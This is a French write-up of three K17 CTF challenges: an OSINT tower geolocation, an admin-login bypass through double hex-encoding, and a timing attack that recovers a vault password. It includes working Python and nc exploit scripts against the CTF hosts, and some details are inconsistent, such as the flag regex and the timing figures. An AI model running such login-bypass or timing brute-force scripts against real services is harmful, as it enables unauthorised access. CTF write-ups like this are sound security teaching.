K17 CTF Write-up

OSINT radioactive

Catégorie: OSINT

Points: 317

Description

Where is this tower located?
Format du flag: K17{lat,lon} avec coordonnées arrondies à 3 décimales

Solution

Analyse de l'image

En zoomant sur la pancarte, on découvre la mention :

NSA Site Number: 2154?06

Un chiffre est masqué par la grille. Le numéro complet est 2154006.

Recherche OSINT

Le panneau indique un site web australien : www.rfnsa.com.au

En recherchant le numéro 2154006, on trouve :

Adresse: Gilbert Road (East of Field 1 Fred Caterson Reserve), CASTLE HILL NSW 2154
Coordonnées: -33.71721, 150.9871
Type: 35m Concrete Pole
Opérateurs: Optus, Telstra (3G/4G/5G)

Extraction des coordonnées

Arrondissement à 3 décimales :

Latitude : -33.71721 → -33.717
Longitude : 150.9871 → 150.987

Flag: K17{-33.717,150.987}

Pass me the salt

Catégorie: Crypto

Points: 200

Description

Se connecter en admin pour afficher le flag.

Solution

🔍 Analyse détaillée du problème

Le serveur présente une vulnérabilité due à une incohérence de format entre l'inscription et la connexion :

# À l'inscription :
password = "admin"
stored = (password).encode().hex()  # "61646d696e"

# À la connexion :
input = "3631363436643639366e"
check = bytes.fromhex(input)  # doit donner b"61646d696e"

Cette incohérence crée une confusion entre :

Le texte hexadécimal (ex: "61646d696e")
Les octets correspondants (b"admin")
Le double encodage hexadécimal nécessaire

Exploitation

Pour se connecter en admin, il faut fournir l'hex de la chaîne "61646d696e" :

b"61646d696e".hex() = 3631363436643639366e

Exploit manuel

$ nc challenge.secso.cc 7002
2
Login: admin
Password: 3631363436643639366e

Explication

L'exploit fonctionne car :

Inscription : hash de salt || "61646d696e" (texte)
Connexion : on doit donner un mot de passe hex qui décode exactement en b"61646d696e"

Remède

Toujours transformer le mot de passe de la même façon à l'inscription et à la connexion (pas de mélange texte/hex).

Scripts d'exploitation

Version minimale :

import socket, re
HOST, PORT = "challenge.secso.cc", 7002
pwd = "3631363436643639366e"
s = socket.create_connection((HOST,PORT))
s.recv(4096); s.sendall(b"2\n")
s.recv(4096); s.sendall(b"admin\n")
s.recv(4096); s.sendall((pwd+"\n").encode())
out = s.recv(4096).decode()
print(out)
m = re.search(r"K17CTF\{[^}]+\}", out)
if m: print("[FLAG]", m.group(0))

Version complète avec gestion des erreurs :

#!/usr/bin/env python3
import socket, time, sys, re

HOST = "challenge.secso.cc"
PORT = 7002

# calcule le "double-hex" demandé par la logique du chall
# admin -> "admin".encode().hex() = "61646d696e"
# password à taper = bytes("61646d696e","ascii").hex() = "3631363436643639366e"
def double_hex(s: str) -> str:
    return bytes(s.encode().hex(), "ascii").hex()

ADMIN_DHEX = double_hex("admin")  # "3631363436643639366e"

def recv_all_until(sock, needles=(b"(1, 2, 3)>", b"flag", b"Flag", b"Congratulations", b"Invalid"), timeout=2.0):
    sock.settimeout(timeout)
    buf = b""
    t0 = time.time()
    while time.time() - t0 < timeout:
        try:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            if any(n in buf for n in needles):
                break
        except socket.timeout:
            break
    return buf

def try_admin_once(verbose=True):
    s = socket.create_connection((HOST, PORT), timeout=5)
    # avale la bannière jusqu'à l'invite
    _ = recv_all_until(s, timeout=2.0)

    s.sendall(b"2\n")
    _ = recv_all_until(s, needles=(b"Login:",), timeout=1.0)
    s.sendall(b"admin\n")
    _ = recv_all_until(s, needles=(b"Password:",), timeout=1.0)
    s.sendall((ADMIN_DHEX + "\n").encode())

    resp = recv_all_until(s, timeout=2.0).decode(errors="ignore")
    s.close()

    if verbose:
        last_lines = "\n".join(resp.splitlines()[-10:])
        print("[server tail]")
        print(last_lines)

    if re.search(r"flag|Flag|Congratulations", resp):
        m = re.search(r"(K17\{[^}]+\}|flag\{[^}]+\}|secso\{[^}]+\})", resp)
        if m:
            print(f"FLAG: ")
        else:
            print("Succès")
        return True

    if "Invalid" in resp:
        return False

    return False

def main():
    print(f"Target: {HOST}:{PORT}")
    print(f"Using admin double-hex password: {ADMIN_DHEX}")

    max_tries = 12
    for i in range(1, max_tries+1):
        print(f"\n[=] Attempt {i}/{max_tries}")
        try:
            ok = try_admin_once(verbose=(i == 1 or i % 3 == 0))
            if ok:
                print("[+] Done.")
                return
        except Exception as e:
            print(f"[!] Attempt {i} error: {e}")
        time.sleep(0.3)

    print("No luck after multiple attempts ")
    print("    Relance le script ")

if __name__ == "__main__":
    main()

vzult

Catégorie: Web

Points: 250

Description

Trouvez le mot de passe du vault en exploitant une vulnérabilité de timing.

Solution

Analyse

Le serveur présente une vulnérabilité de timing attack :

Le temps de réponse est plus élevé quand un caractère est correct
Pour le premier caractère : ~200ms si correct, ~100ms si incorrect
Pour les suivants : ~1030ms si correct, ~1000ms si incorrect
La différence de taille de réponse aide aussi à identifier les bons caractères

🎯 Exploitation détaillée du timing attack

L'attaque fonctionne car le serveur vérifie le mot de passe caractère par caractère :

Comportement normal :
- Mauvais caractère : réponse rapide (~100ms)
- Le serveur arrête la vérification dès qu'un caractère est incorrect
Comportement avec caractère correct :
- Premier caractère correct : ~200ms
- Caractères suivants : ~30ms supplémentaires par caractère
- Le serveur continue la vérification, d'où le délai plus long
Indices supplémentaires :
- Taille de réponse différente pour les bons caractères
- Accumulation progressive des délais
- Possibilité de construire le mot de passe caractère par caractère

# Exemple de progression des délais :
H    -> 200ms  (bon premier caractère)
Ha   -> 230ms  (bon deuxième caractère)
Hac  -> 260ms  (bon troisième caractère)
Hack -> 290ms  (mot complet correct)

Script d'exploit

import requests, string

url = "https://vault.secso.cc/"
charset = string.ascii_letters + string.digits + "{}_"

known = ""
while True:
    best_char, best_time = None, -1
    for c in charset:
        test = known + c
        r = requests.get(url, params={"password": test})
        text = r.text
        try:
            t = float(text.split("Response time:")[1].split("ms")[0].strip())
        except:
            t = 0.0
        if t > best_time:
            best_char, best_time = c, t
    if best_time <= 0:
        break
    known += best_char
    print("[+] Found so far:", known)

Approche manuelle avec Burp

On peut aussi utiliser Burp Intruder pour visualiser les différences de timing :

Configuration de l'attaque par caractère
Analyse des temps de réponse
Identification des caractères corrects par les pics de timing

Métho

Test caractère par caractère
Pour 'H' : temps de réponse ~200ms (au lieu de 100ms)
Chaque caractère correct ajoute ~30ms au temps de base
La taille de réponse change aussi pour les caractères corrects

Write-up K17 CTF

OSINT radioactive

Description

Solution

Analyse de l'image

Recherche OSINT

Extraction des coordonnées

Pass me the salt

Description

Solution

🔍 Analyse détaillée du problème

Exploitation

Exploit manuel

Explication

Remède

Scripts d'exploitation

vzult

Description

Solution

Analyse

🎯 Exploitation détaillée du timing attack

Script d'exploit

Approche manuelle avec Burp

Métho